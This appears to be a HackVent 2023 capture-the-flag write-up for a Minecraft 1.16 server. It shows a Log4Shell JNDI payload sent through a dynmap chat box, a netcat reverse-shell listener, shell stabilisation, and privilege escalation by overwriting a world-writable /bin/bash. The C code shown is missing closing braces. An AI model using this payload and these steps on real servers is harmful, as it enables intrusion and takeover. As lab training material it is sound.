HackVent 2023 - [HV23.19] Santa's Minecraft Server
Difficulty: Hard
Categories: Linux, Penetration Testing
Author: nichtseb
Santa likes to play minecraft. His favorite version is 1.16. For security reasons, the server is not publicly accessible. But Santa is a little show-off, so he has an online map to brag about his fabulous building skills.
We get access to a dynmap web interface. The mentioned version 1.16 is vulnerable to the log4j exploit.
Dynmap has a chat box that we can utilize to exploit the log4j vulnerability using this PoC.
We can run the PoC using python3 poc.py --userip 10.13.0.xx --webport 8000 --lport 9001
and also start a netcat listener using nc -lvp 9001
The PoC outputs us a payload tat we can use:
[+] Send me: ${jndi:ldap://10.13.0.xx:1389/a}`
After entering this in the chat box, we get a reverse shell connection. First, we stabilize the shell:
/usr/bin/script -qc /bin/bash /dev/null
stty raw -echo; fg
We can’t read the flag under /home/santa/flag.txt
so probably we’ll have to do privilege escalation. There is a /santas-workshop
with a tool
binary that has the setuid bit set for the santa
There is also source code for the tool binary:
#include <unistd.h>
#include <stdio.h>
void debugShell() {
printf("Launching debug shell...\n");
char *argv[] = { "/bin/bash", 0 };
execve(argv[0], &argv[0], NULL);
void main() {
printf("--- Santas Workshop Tool ---\n");
printf("Pick an action:\n");
printf("s) debug shell\n");
printf("-- more options to come\n");
char option;
scanf("%c", &option);
switch (option) {
case 's': debugShell(); break;
default: printf("Unknonwn option!\n"); break;
Bash ususally drops the setuid privileges, we could circumvent that with suidbash (which was the inteneded solution).
However, I noticed that /bin/bash
is world-writeable so I just compiled an own binary and overwrote it:
cat > /tmp/shell.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
system("cat /home/santa/flag.txt");
return 0;
gcc -o /tmp/shell /tmp/shell.c
cat /tmp/shell > /bin/bash
--- Santas Workshop Tool ---
Pick an action:
s) debug shell
-- more options to come
Launching debug shell...